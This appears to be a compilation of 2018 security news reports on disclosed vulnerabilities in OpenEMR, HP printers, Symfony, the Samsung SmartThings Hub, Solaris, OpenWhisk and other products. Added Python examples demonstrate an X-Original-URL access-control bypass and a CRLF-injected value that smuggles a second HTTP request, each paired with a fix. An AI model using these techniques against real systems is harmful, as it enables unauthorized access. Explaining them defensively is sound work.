Researchers have discovered nearly two dozen vulnerabilities in the OpenEMR software, including critical flaws that can be exploited to gain unauthorized access to medical records.

OpenEMR is a highly popular open source application for managing electronic health records and medical practices. The free application offers a wide range of features and can run on various operating systems, including Windows, Linux and macOS.

Researchers at Project Insecurity, which provides penetration testing, vulnerability assessment and other cybersecurity services, conducted a detailed analysis of the OpenEMR source code. The analysis, based on manual source code review and testing with Burp, led to the discovery of 23 flaws.

Fifteen of the security holes have been rated “high severity.” These include an authentication bypass issue that allows an attacker to access the patient portal, SQL injection flaws, remote command execution bugs, and arbitrary file read/write issues.

The authentication bypass vulnerability can be exploited by an unauthenticated attacker by navigating to the patient registration page and then modifying the URL to access pages that would normally require authentication, including ones storing patient data.

Experts discovered a total of nine SQL injection vulnerabilities, including ones that provide access to databases storing sensitive information. Exploiting the SQL injection flaws requires authentication, but that can be achieved using the aforementioned security bypass.

Four remote command execution flaws have been identified by experts, but they all require authentication, including admin privileges in some cases.

Researchers also found vulnerabilities that can be exploited to upload, read or delete files on the system. Exploitation requires authentication, but their impact can be high.

According to Project Insecurity, OpenEMR is affected by several cross-site request forgery (CSRF) vulnerabilities. In some cases, these flaws can be exploited to escalate privileges and execute arbitrary code if the attacker can convince an administrator to click on a malicious link.

The other vulnerabilities discovered by Project Insecurity include unrestricted file upload, information disclosure and other issues classified as medium or low severity.

Project Insecurity has published a 28-page report detailing each of the flaws, including impact, cause, and proof-of-concept (PoC) code. The report also shares recommendations on how the security holes can be addressed.

The vulnerabilities were reported to OpenEMR developers on July 7 and patches were rolled out for all the bugs within roughly two weeks.


HP releases firmware updates for two critical RCE flaws in Inkjet Printers
7.8.2018 securityaffairs
Vulnerebility

HP has released firmware updates that address two critical remote code execution vulnerabilities in some models of inkjet printers.
HP has released firmware updates to address two critical RCE flaws affecting some Inkjet printers. The two flaws, tracked as CVE-2018-5924 and CVE-2018-5925, could be exploited by attackers to trigger a stack or static buffer overflow.

An attacker can exploit the vulnerabilities by sending a specially crafted file to the vulnerable inkjet printers.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.

The flaws have been assigned a CVSS score of 9.8 and affect roughly 160 models, including PageWide, DesignJet, Officejet, Deskjet, Envy, and Photosmart devices.

To download the firmware updates, go to the HP Software and Drivers page for your product and find the appropriate firmware update from the list of available software.
Go to the Upgrading Printer Firmware page and follow the instructions provided to install the firmware.


Flaws in printer firmware are not a novelty: in November 2017, experts from the FoxGlove Security firm found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.

HP recently launched a private bug bounty program that offers up to $10,000 to white hat hackers who discover serious issues in its printers.


HP Patches Critical RCE Flaws in Inkjet Printers
6.8.2018 securityweek 
Vulnerebility

HP has released firmware updates for many of its inkjet printers to address two critical vulnerabilities that can be exploited for remote code execution.

According to the HP Product Security Response Team (PSRT), the company’s Inkjet printers are affected by flaws that allow an attacker to trigger a stack or static buffer overflow and execute arbitrary code by sending a specially crafted file to an affected device.

The vulnerabilities are tracked as CVE-2018-5924 and CVE-2018-5925, and they have both been assigned a CVSS score of 9.8.

HP has shared a list of roughly 160 impacted products, including PageWide, DesignJet, Officejet, Deskjet, Envy and Photosmart devices. The firmware updates for each impacted product can be obtained from HP’s website.

This is not the first time a remote code execution flaw has been found in HP printers. Last year, researchers discovered several potentially serious vulnerabilities in some of HP’s enterprise printers, including an RCE bug affecting LaserJet Enterprise, PageWide Enterprise, LaserJet Managed and OfficeJet Enterprise printers.

HP recently announced the launch of a private bug bounty program that offers up to $10,000 for serious vulnerabilities found in the company’s printers. HP had invited 34 researchers by the time the initiative was unveiled.

The program covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).


Salesforce warns of API error that exposed Marketing data
5.8.2018 securityweek
Vulnerebility

The US Cloud-based customer relationship management software giant Salesforce is warning marketing customers of a data leakage caused by an API error.
The US cloud computing company Salesforce is warning marketing customers of a data leakage caused by an API error. The incident could potentially affect a large number of companies, including Aldo, Dunkin Donuts, GE, HauteLook, Nestle Waters, and Sony.

The error was in production from June 4 to July 18 and potentially affected users of two modules within the broader Marketing Cloud offering, Email Studio and Predictive Intelligence.

“On July 18, we became aware of an issue that impacted a subset of Marketing Cloud customers using Marketing Cloud Email Studio and Predictive Intelligence.” reads the notice published by Salesforce.

“We resolved the issue on that same day, July 18. Customers who may have been impacted were notified. For additional details, please see the Email Studio and Predictive Intelligence REST API Issue article here: https://sfdc.co/XIbG2”


The news was first reported by BankInfoSecurity that obtained a copy of the alert distributed by the company via email on Thursday.

Salesforce states that the error involved the company’s REST application programming interface.

“During a Marketing Cloud release between June 4, 2018, and July 7, a code change was introduced that, in rare cases, could have caused REST API calls to retrieve or write data from one customer’s account to another inadvertently,” reads the alert issued by Salesforce and published by BankInfoSecurity.

“Where the issue occurred, the API call may have failed and generated an error message rather than writing or modifying data.”

The company also warns that some customers may have had their data corrupted; it has posted a knowledge article on the issue.

The bad news for the company’s customers is that it is currently unable to say whether any data was altered, or whether attackers maliciously tampered with it.

“We have no evidence of malicious behavior associated with this issue,” a Salesforce spokesman told ISMG.

“We are unable to confirm if your data was viewed or modified by another customer,” Salesforce explained in its alert, noting that it was notifying all customers just to be on the safe side. “While Salesforce continues to conduct additional quality checks and testing in relation to this issue, we recommend that you monitor and review your data carefully to ensure the accuracy of your account.”


CVE-2018-14773 Symfony Flaw expose Drupal websites to hack
3.8.2018 securityaffairs 
Vulnerebility

A vulnerability in the Symfony HttpFoundation component, tracked as CVE-2018-14773, could be exploited by attackers to bypass access restrictions enforced by web servers and caches in front of affected Drupal websites.
Maintainers at Drupal addressed the security bypass vulnerability by releasing a new version of the popular content management system, version 8.5.6.

“The Drupal project uses the Symfony library. The Symfony library has released a security update that impacts Drupal. Refer to the Symfony security advisory for the issue. The same vulnerability also exists in the Zend Feed and Diactoros libraries included in Drupal core; however, Drupal core does not use the vulnerable functionality.” reads the advisory published by Drupal.

“If your site or module uses Zend Feed or Diactoros directly, read the Zend Framework security advisory and update or patch as needed.”

The Symfony HttpFoundation component is a third-party library used in Drupal core; the flaw affects Drupal 8.x versions before 8.5.6.

Symfony is a web application framework used by a large number of projects, which means that the CVE-2018-14773 vulnerability could potentially affect many web applications beyond Drupal.

The flaw is due to Symfony’s support for legacy and risky HTTP headers.

“Support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header allows a user to access one URL but have Symfony return a different one which can bypass restrictions on higher level caches and web servers.” reads the security advisory published by Symfony.

“The fix drops support for these two obsolete IIS headers: X-Original-URL and X_REWRITE_URL.” the advisory continues.

A remote attacker can trigger the flaw by sending a request with a specially crafted ‘X-Original-URL’ or ‘X-Rewrite-URL’ HTTP header value: the front-end sees and authorizes one path, while Symfony routes the request to the path named in the header.
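The bypass in miniature, as an added example that is not Symfony or Drupal code: a front-end rule blocks `/admin` based on the request-line path, while the application behind it (the `legacy_path_info` model of the pre-fix behaviour) lets an `X-Original-URL` or `X-Rewrite-URL` header replace that path. The deny list, the header normalisation (lower-case, underscores folded to dashes) and the sample requests are assumptions made for the illustration, not details from the advisory.

```python
from typing import Callable, Mapping, Optional, Tuple

# Paths the front-end (reverse proxy, cache or web server) is configured to block.
FRONTEND_DENY_PREFIXES = ("/admin",)


def frontend_allows(request_path: str) -> bool:
    """The front-end rule only ever sees the path from the request line."""
    return not any(request_path == p or request_path.startswith(p + "/")
                   for p in FRONTEND_DENY_PREFIXES)


def _normalised(headers: Mapping[str, str]) -> dict:
    # Header names are case-insensitive; this model also folds '_' to '-',
    # so X_REWRITE_URL and X-Rewrite-URL are treated as the same header.
    return {k.lower().replace("_", "-"): v for k, v in headers.items()}


def legacy_path_info(request_path: str, headers: Mapping[str, str]) -> str:
    """Vulnerable behaviour: an X-Original-URL or X-Rewrite-URL header
    replaces the path the application routes on."""
    h = _normalised(headers)
    for name in ("x-original-url", "x-rewrite-url"):
        if name in h:
            return h[name].split("?", 1)[0]   # drop any query string
    return request_path


def fixed_path_info(request_path: str, headers: Mapping[str, str]) -> str:
    """Patched behaviour: the override headers are ignored entirely."""
    return request_path


def route(request_path: str, headers: Mapping[str, str],
          resolver: Callable[[str, Mapping[str, str]], str]) -> Tuple[str, Optional[str]]:
    """Return (front-end decision, path the application would actually serve)."""
    if not frontend_allows(request_path):
        return "denied", None
    return "allowed", resolver(request_path, headers)


if __name__ == "__main__":
    smuggled = {"X-Original-URL": "/admin/users"}
    print(route("/admin/users", {}, legacy_path_info))   # ('denied', None)
    print(route("/", smuggled, legacy_path_info))        # ('allowed', '/admin/users')  <- bypass
    print(route("/", smuggled, fixed_path_info))         # ('allowed', '/')
```

The practical check for any stack, not only Symfony, is the second call: request an innocuous path with an `X-Original-URL` header naming a restricted one, and see whether the response comes from the restricted resource. A web server or proxy that strips these headers before forwarding closes the same gap from the other side.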

According to the security advisory published by Symfony, versions 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3 address the flaw.


The Drupal maintainers also found a similar ‘URL rewrite’ issue affecting the Zend Feed and Diactoros libraries shipped with Drupal core, but confirmed that Drupal core does not use the vulnerable functionality.

Administrators of websites that use Zend Feed or Diactoros directly need to patch them as soon as possible.

Drupal administrators should patch their installs urgently, before attackers start exploiting the CVE-2018-14773 flaw.


HP Launches Bug Bounty Program for Printers
1.8.2018 securityweek  
Vulnerebility

HP announced on Tuesday the launch of a bug bounty program for printers. The company is prepared to pay out up to $10,000 for serious vulnerabilities found in its products.

The initiative, which HP calls the industry’s first printer bug bounty program, was launched in partnership with crowdsourced security platform Bugcrowd.

The program is private, which means not everyone can participate. Researchers invited by HP have been instructed to focus on firmware-level vulnerabilities, including remote code execution, cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs.

The rewards range between $500 and $10,000 per flaw, but HP is not disclosing the specific payouts for each type of issue. Researchers can also earn a reward if they report a vulnerability previously discovered by HP itself – the company describes this as a “good faith payment.”

The bug bounty program currently covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

HP told SecurityWeek that currently it’s engaged with 34 researchers. The company says the program covers only endpoint devices – printer-related web domains are out of scope – with a focus on print firmware.

The company plans on expanding the program to its PC line soon, but it currently focuses on printers due to concerns that the technological advancements in this area make these types of devices an attractive target for malicious actors. HP noted that printers can not only provide access to the network that houses them, but they can also expose confidential documents.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP's Chief Technologist of Print Security. “HP is committed to engineering the most secure printers in the world.”


Samsung Patches Critical Vulnerabilities in SmartThings Hub
31.7.2018 securityweek
Vulnerebility

Samsung has patched a series of critical vulnerabilities in its SmartThings Hub, which could be exploited to execute OS commands or other arbitrary code on vulnerable devices.

Designed as a central controller, the SmartThings Hub allows users to monitor and manage smart home devices such as smart plugs, LED light bulbs, thermostats, cameras, and more. The controller runs a Linux-based firmware that communicates with Internet of Things devices deployed in the home using Ethernet, Zigbee, Z-Wave and Bluetooth.

An attacker able to leverage the discovered vulnerabilities could access sensitive information gathered by the connected devices, monitor and control devices within the home, and perform unauthorized activities. They could also unlock homes, monitor users via cameras inside homes, disable motion detectors, and even cause physical damage to appliances.

A total of 20 vulnerabilities impacting the SmartThings Hub were discovered by Talos researchers, who reveal that an attacker could “chain together three vulnerability classes that are present in the device to gain complete control of the device.” In a blog post, the researchers also describe different attack vectors an actor looking to exploit these vulnerability chains could use.

The vulnerabilities were found in the Samsung SmartThings Hub STH-ETH-250 running firmware version 0.20.17. Samsung has already released patches for all flaws. Because Samsung pushes updates automatically, user interaction should not be necessary, but users are advised to verify that the updated firmware has actually been applied to their devices.


Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek
Vulnerebility  Virus

A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.

The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).

Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.

The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.

In addition to gathering a variety of system information, the malware also reads registry entries for potential privilege escalation and for proxy information.

Based on received commands, the backdoor can fingerprint the infected machine, drop a file and execute it, launch a remote shell, terminate the connection to the C&C, download and run a batch script, download a file, and upload a file.

Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.

The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.

“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.


Tens of flaws in Samsung SmartThings Hub expose smart home to attack
30.7.2018 securityaffairs
Vulnerebility  IoT

Cisco Talos researchers found tens of flaws in Samsung SmartThings Hub controller that potentially expose smart home devices to attack
Cisco Talos researchers have discovered 20 vulnerabilities in Samsung SmartThings Hub controller that potentially expose any supported third-party smart home devices to cyber attack.

“Cisco Talos recently discovered several vulnerabilities present within the firmware of the Samsung SmartThings Hub.” reads the analysis published by Talos.

“These vulnerabilities could allow an attacker to execute OS commands or other arbitrary code on affected devices.”

The Samsung SmartThings Hub is a central controller that could be used to manage a broad range of internet-of-things (IoT) devices in a smart home, including smart plugs, LED light bulbs, thermostats, and cameras.

Access to those IoT devices could allow attackers to gather sensitive information managed by the devices within the home and perform unauthorized activities.

The Samsung SmartThings Hub runs a Linux-based firmware and communicates with IoT devices over various wireless standards such as Zigbee, Z-Wave, and Bluetooth.

Talos researchers explained that in order to exploit the flaws, the attacker needs to chain a number of existing vulnerabilities together.

“It is possible to gather the set of preconditions needed to exploit bugs that would otherwise be unreachable by using multiple vulnerabilities.” researchers said.

“This is commonly referred to as “chaining.” When considering the severity of vulnerabilities, it is essential to keep in mind that they might be used as part of a chain, as this would significantly elevate their severity.”

The experts identified three notable chains; only one of them leads to remote code execution (RCE) without prior authentication.

RCE Chain – CVE-2018-3911

This RCE chain targets the hub’s “video-core” HTTP server. Its entry point, CVE-2018-3911, is an exploitable HTTP header injection bug in the communications (over port 39500) between the hub and its remote servers; by sending specially crafted HTTP requests to a vulnerable device, a remote attacker can inject HTTP requests into the video-core process from the network.

“This vulnerability is present within the JSON processing performed by the `hubCore` binary present within the SmartThings hub and could be combined with other vulnerabilities present within affected devices to achieve code execution.” states the report.
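The bug class behind this entry point, shown as an added example rather than as Samsung’s or Talos’s code: an HTTP request assembled by string concatenation from a value taken out of attacker-influenced JSON. A carriage return and line feed inside that value end the request line early, and whatever follows is parsed as extra headers or as a whole second request. The JSON document, the `/internal/reset` path and the request format are constructed stand-ins, not details of the hub’s real protocol.

```python
import json
from urllib.parse import quote


class HeaderInjection(ValueError):
    """Raised when a value would break out of its HTTP field."""


def build_request_unsafe(doc: dict) -> bytes:
    """Vulnerable: values lifted from the JSON document are concatenated into
    the request text, so CR/LF inside 'path' terminates the request line and
    everything after it becomes additional headers or a second request."""
    return "GET {} HTTP/1.1\r\nHost: {}\r\n\r\n".format(doc["path"], doc["host"]).encode()


def _reject_controls(value: str, field: str) -> None:
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise HeaderInjection(f"control character in {field}")


def build_request_safe(doc: dict) -> bytes:
    """Hardened: refuse control characters in any value that becomes part of
    the request, require an absolute path, and percent-encode it so that a
    space can never split the request line."""
    path, host = str(doc["path"]), str(doc["host"])
    _reject_controls(path, "path")
    _reject_controls(host, "host")
    if not path.startswith("/") or " " in host:
        raise HeaderInjection("malformed path or host")
    return "GET {} HTTP/1.1\r\nHost: {}\r\n\r\n".format(quote(path, safe="/?=&%"), host).encode()


def split_requests(raw: bytes):
    """Split an outbound byte stream into the request heads a server would see."""
    return [head.split(b"\r\n") for head in raw.split(b"\r\n\r\n") if head]


if __name__ == "__main__":
    # Constructed sample documents: one benign, one carrying CR/LF in "path".
    benign = json.loads('{"path": "/status", "host": "127.0.0.1"}')
    evil = json.loads(
        '{"path": "/status HTTP/1.1\\r\\nHost: 127.0.0.1\\r\\n\\r\\n'
        'POST /internal/reset HTTP/1.1\\r\\nX-Pad:", "host": "127.0.0.1"}')
    for label, doc in (("benign", benign), ("evil", evil)):
        heads = split_requests(build_request_unsafe(doc))
        print(f"unsafe/{label}: {len(heads)} request(s); first lines: {[h[0] for h in heads]}")
    try:
        build_request_safe(evil)
    except HeaderInjection as e:
        print("safe/evil: rejected:", e)
```

The unsafe builder turns the second document into two requests on the wire, the second of which the attacker wrote in full; the hardened builder rejects it before anything is sent. Rejecting control characters at the boundary where untrusted data enters a protocol string is the general fix; encoding alone is not enough if the value can still contain CR or LF.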


Other chains

Other chains identified by the researchers could be exploited only by an authenticated attacker.

The second chain also leads to remote code execution, but requires authentication. It starts from CVE-2018-3879, which allows an authorized attacker to execute SQL queries against a database running on the device.

Experts noticed that chaining this flaw with a string of other memory corruption vulnerabilities affecting the Samsung SmartThings Hub (CVE-2018-3880, CVE-2018-3906, CVE-2018-3912 to CVE-2018-3917, and CVE-2018-3919) makes it possible to execute arbitrary code on the device from the network.

Experts highlighted that CVE-2018-3879 is also the starting point of the final chain, which leads to remote information leakage: the vulnerability can be used to create an empty file inside the device.

“Remote information leakage: TALOS-2018-0556 can also be used to create an empty file anywhere inside the device. As described in TALOS-2018-0593, the existence of an empty file at path “/hub/data/hubcore/stZigbee” will make the “hubCore” process to crash. Moreover, as described in TALOS-2018-0594, when the “hubCore” process crashes, it triggers an information leak that can be captured from the network.” reads the analysis published by Talos.

“By chaining these 3 vulnerabilities in order, an attacker can obtain a memory dump of the `hubCore` process, which contains most of the core logic, and consequent sensitive information, of the Hub.”

Talos experts tested and confirmed that the Samsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17 is affected by the flaws.

Samsung has addressed the flaws, and security updates have been pushed out automatically.

“Talos recommends that these devices are updated as quickly as possible. As Samsung pushes updates out to devices automatically, this should not require manual intervention in most cases. It is important to verify the updated version has actually been applied to devices to ensure that they are no longer vulnerable. Samsung has released a firmware update that resolves these issues. An advisory related to these vulnerabilities can be found here.” concludes Talos.


Experts discovered a Kernel Level Privilege Escalation in Oracle Solaris
28.7.2018 securityaffairs
Vulnerebility

Security expert discovered Kernel Level Privilege Escalation vulnerability in the Availability Suite Service component of Oracle Solaris 10 and 11.3
Security researchers from Trustwave have discovered a new high severity vulnerability, tracked as CVE-2018-2892, affecting the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The flaw could be exploited by an authenticated local attacker to execute code in the kernel and thus escalate privileges.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation.” reads the security advisory published by the company.

“The issue is the result of a signedness bug in the bounds checking of the ‘SDBC_TEST_INIT’ ioctl code sent to the ‘/dev/sdbc‘ device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

The flaw was actually first discovered in 2007 and publicly disclosed in 2009 at the CanSecWest security conference.

The vulnerability is the result of a combination of several arbitrary memory dereference issues and an unbounded memory write.

“The original issue was disclosed on stage at CanSec 2009 ( https://cansecwest.com/slides.html).” reads the analysis published by Trustwave. “The root cause of the issue is a combination of an arbitrary memory dereference through a lack of bounds checking on a user-controlled array index combined with an unbounded user-controllable length in the call to copyin(). The combined result is an arbitrary memory write and overflow in the call to copyin().”


Oracle also rolled out a security patch after the issue was disclosed, but evidently the problem was not totally addressed.

“Exploitation of the issue is almost identical to the exploit developed back in 2007 for the original issue with the exception of a change in architecture between OpenSolaris running on x86 (32-bit) and the newer Oracle Solaris 11 running on x86-64 taking into account that the user-supplied index uap->ar must now be a negative value.” continues Trustwave.

According to the experts, the flaw is present again because additional code introduced for testing purposes reaches the vulnerable path.

Oracle addressed this flaw as part of the July 2018 Critical Patch Update (CPU).


NetSpectre is a remote Spectre attack that allows stealing data over the network
28.7.2018 securityaffairs
Vulnerebility

Researchers discovered a new variant of the Spectre attack, dubbed NetSpectre, that allows to steal data over the network from the target system.
A group of researchers has devised a new variant of the Spectre attack, dubbed NetSpectre, that could allow an attacker to steal data over the network from the target system.

NetSpectre is described as a remote side-channel attack that, like Spectre variant 1 (CVE-2017-5753), exploits a flaw in the speculative execution mechanism. The technique can be used to break address-space layout randomization on the remote system and to read its memory over the network, without running any attacker-controlled code on the target.

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be used to extract information from the attacker’s own process; for example, malicious JavaScript can extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The researchers who discovered the NetSpectre attack explain that the technique leverages an AVX-based covert channel to leak data from the target system at the very low rate of 60 bits per hour.

“we present NetSpectre, a generic remote Spectre variant 1 attack. ” reads the research paper.

“Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high performance AVX-based covert channel that we use in our cachefree Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system”

An attacker could carry out the Netspectre attack to read arbitrary memory from the systems that have a network interface exposed on the network and that contain the required Spectre gadgets.

“As our NetSpectre attack is mounted over the network, the victim device requires a network interface an attacker can reach. The attacker must be able to send a large number of network packets to the victim,” continues the paper.

“Depending on the gadget location, the attacker has access to either the memory of the entire corresponding application or the entire kernel memory, typically including the entire system memory.” the researchers said.

An attacker just needs to send a series of specially crafted requests to the target machine and observe the timing difference in the network packet response time to leak a secret value from the machine’s memory.

“In contrast to local Spectre attacks, where a single measurement can already be sufficient, NetSpectre attacks require a large number of measurements to distinguish bits with a certain confidence” continues the paper.

The researchers reported the NetSpectre attack to Intel in March, and the chip maker said the issue is addressed by the first set of Spectre mitigations it released.


Apache OpenWhisk Flaws Allowed Attackers to Overwrite Code in IBM Cloud
26.7.2018 securityweek
Vulnerebility

Researchers discovered that two vulnerabilities in the Apache OpenWhisk serverless cloud platform could have allowed malicious actors to overwrite and execute arbitrary code.

Apache OpenWhisk is an open source platform designed to execute code in response to events. The platform handles infrastructure and servers so that users can focus on developing their applications.

IBM’s Cloud Functions function-as-a-service (FaaS) platform is based on Apache OpenWhisk, which made it vulnerable to attacks.

One of the vulnerabilities, tracked as CVE-2018-11757, was discovered by researchers at PureSec. Another issue, CVE-2018-11756, was identified during an investigation into CVE-2018-11757.

Both Apache OpenWhisk developers and IBM have created patches that should prevent attacks.

According to PureSec, the vulnerabilities could have allowed an attacker – under certain conditions – to overwrite the source code of a function being executed in a container and influence subsequent executions in the same container, even if they were carried out by a different user.

Successful exploitation of the vulnerabilities could have resulted in sensitive data getting leaked, or the execution of rogue logic in parallel to a legitimate action’s original logic.

“In addition, an attacker may launch similar attacks in parallel, and in turn affect additional containers, turning the attack into a more persistent or wide-spread threat,” PureSec explained.

Specifically, PureSec says an attacker could have exploited the flaws to obtain sensitive user data, such as passwords, modify or delete information, mine cryptocurrencies, or launch distributed denial-of-service (DDoS) attacks.

OpenWhisk runs each action (function) inside a Docker container and interaction with the function involves a REST interface accessible over port 8080. Each container has two endpoints: /init, which receives the code to be executed, and /run, which receives the arguments for the action and executes the code.

If an attacker could find a vulnerability in the function, such as a remote code execution flaw, they may have been able to force it to launch a local HTTP request to the /init interface on port 8080 and overwrite its source code.

PureSec has published a technical advisory, a blog post, and a video showing how an attack worked against IBM Cloud Functions.

“[PureSec] research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code,” said Rodric Rabbah, one of the creators of Apache OpenWhisk.

“The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits,” Rabbah added.
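The two container endpoints described above, and the mitigation Rabbah describes (a runtime that notices an attempt to mutate itself from inside a running container), as an added example that is not Apache OpenWhisk's own runtime code. The JSON layout mirrors the shape of the runtime protocol but is simplified; the 403 response, the log text and the demo action are assumptions.

```python
"""Single-initialization guard for an OpenWhisk-style action container.

Added example, not Apache OpenWhisk's own runtime code. It models the two
container endpoints described above (/init receives the code, /run executes it)
with a minimal http.server handler and shows the mitigation the article says
the runtimes adopted: once a container has been initialized, a later /init is
refused and logged instead of silently replacing the running code. The JSON
layout mirrors the runtime protocol's shape but is simplified; the 403 status
and log text are assumptions.
"""
import json
import logging
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

log = logging.getLogger("action-guard")


class ActionContainer:
    """State of one container: the single code blob it may ever receive."""

    def __init__(self):
        self._lock = threading.Lock()
        self._namespace = None   # globals of the loaded action module
        self._entry = None       # name of the action's entry point
        self.init_count = 0      # how many /init requests arrived in total

    def init(self, payload):
        """Handle /init. Returns (status, body). Only the first call loads code."""
        with self._lock:
            self.init_count += 1
            if self._namespace is not None:
                # Mitigation: refuse to mutate an already-initialized container.
                log.warning("refused re-initialization of a running action")
                return 403, {"error": "Cannot initialize the action more than once."}
            code = payload.get("value", {}).get("code", "")
            entry = payload.get("value", {}).get("main", "main")
            ns = {}
            exec(code, ns)            # the action source defines its entry point
            if entry not in ns:
                return 502, {"error": "entry point %r not found" % entry}
            self._namespace = ns
            self._entry = entry
            return 200, {"OK": True}

    def run(self, payload):
        """Handle /run: call the loaded entry point with the request's args."""
        if self._namespace is None:
            return 502, {"error": "action not initialized"}
        args = payload.get("value", {})
        return 200, self._namespace[self._entry](args)


class Handler(BaseHTTPRequestHandler):
    container = ActionContainer()   # one container per process, like the real runtime

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        payload = json.loads(self.rfile.read(length) or b"{}")
        if self.path == "/init":
            status, body = self.container.init(payload)
        elif self.path == "/run":
            status, body = self.container.run(payload)
        else:
            status, body = 404, {"error": "unknown endpoint"}
        data = json.dumps(body).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def demo():
    """Exercise the guard without a socket: first init loads, second is refused."""
    c = ActionContainer()
    action = "def main(args):\n    return {'greeting': 'hello ' + args.get('name', 'world')}\n"
    first = c.init({"value": {"code": action, "main": "main"}})
    replacement = "def main(args):\n    return {'greeting': 'replaced'}\n"
    second = c.init({"value": {"code": replacement, "main": "main"}})
    result = c.run({"value": {"name": "demo"}})
    return first[0], second[0], result[1]["greeting"]


if __name__ == "__main__":
    print(demo())  # (200, 403, 'hello demo')
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```

The guard lives in the container, not in the function: a vulnerable action that is tricked into POSTing to its own /init still cannot change what later invocations in that container execute, and the warning gives the operator a signal to investigate the action that attempted it.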


Researchers Resurrect Decade-Old Oracle Solaris Vulnerability
26.7.2018 securityweek
Vulnerebility

One of the Solaris vulnerabilities patched by Oracle with its July 2018 Critical Patch Update (CPU) exists due to an ineffective fix implemented by the company for a flaw first discovered in 2007.

The new vulnerability, identified by researchers at Trustwave and tracked as CVE-2018-2892, impacts the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The security hole has been classified as high severity due to the fact that it allows an attacker to execute code with elevated privileges, but it cannot be exploited remotely without authentication.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation,” Trustwave wrote in an advisory. “The issue is the result of a signedness bug in the bounds checking of the 'SDBC_TEST_INIT' ioctl code sent to the '/dev/sdbc' device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

According to Trustwave, the vulnerability was originally discovered back in 2007 and its details were disclosed in 2009 at the CanSecWest security conference. The root cause of the issue is a combination of several arbitrary memory dereference bugs and an unbounded memory write bug.

Oracle released a patch sometime after the vulnerability was disclosed, but Trustwave discovered that the fix had been ineffective.

Exploitation of CVE-2018-2892 is “almost identical” to the original flaw, the most significant difference being related to the change in architecture between the open source OpenSolaris running on a 32-bit system and Oracle Solaris 11 running on a 64-bit system. Oracle discontinued OpenSolaris after acquiring Sun Microsystems in 2010.

Researchers believe the new vulnerability may exist due to some code introduced for testing purposes.

Another vulnerability patched by Oracle with its latest CPU is CVE-2018-2893, a critical flaw that allows attackers to remotely take control of WebLogic Server systems. The security hole has already been exploited in the wild to deliver cryptocurrency miners, backdoors and other types of malware.


Car Sharing Apps Vulnerable to Hacker Attacks: Kaspersky
26.7.2018 securityweek
Vulnerebility

Researchers at Kaspersky Lab have analyzed over a dozen mobile applications provided by car sharing companies and discovered serious security holes that can be exploited to obtain personal information and even steal vehicles.

The security firm’s employees have investigated a total of 13 car sharing apps for Android. The targeted applications are used in the U.S., Europe and Russia, and they have been downloaded more than 1 million times from Google Play.

